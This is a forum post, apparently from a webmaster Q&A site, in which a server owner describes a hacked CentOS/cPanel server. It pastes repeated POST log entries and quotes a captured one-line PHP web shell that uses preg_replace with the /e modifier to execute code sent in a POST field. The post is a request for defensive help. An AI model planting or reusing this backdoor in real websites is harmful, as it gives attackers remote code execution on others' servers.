Mobile app version of vmapp.org
Login or Join
Jessie594

: Server has been hacked. CXS Cleaned it up but hackers keep uploading scripts On Centos X64 / Apache / WHM / Cpanel When I look in my apache_logs I see THOUSANDS of these types of LOGS.

@Jessie594

Posted in: #Apache #Centos #Php

On Centos X64 / Apache / WHM / Cpanel

When I look in my apache_logs I see THOUSANDS of these types of LOGS. various days, always a different IP over and over and over. What are they trying to do? are they using an exploit of some sorts? I have root access so I can search for things if someone has an idea?

24.159.0.128 - - [19/May/2017:05:30:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:32:52 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:34:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:36:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:38:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
24.159.0.128 - - [19/May/2017:05:40:53 +0000] "POST / HTTP/1.1" 200 111 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"


Also in one of their uploaded hack scripts that CXS blocked I see this

EEC4D8E4439299046B8CDB3F782<?php @preg_replace ("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>


is there something I can search for or any help would be appreciated!

10% popularity Vote Up Vote Down


Login to follow query

More posts by @Jessie594

0 Comments

Sorted by latest first Latest Oldest Best

Back to top | Use Dark Theme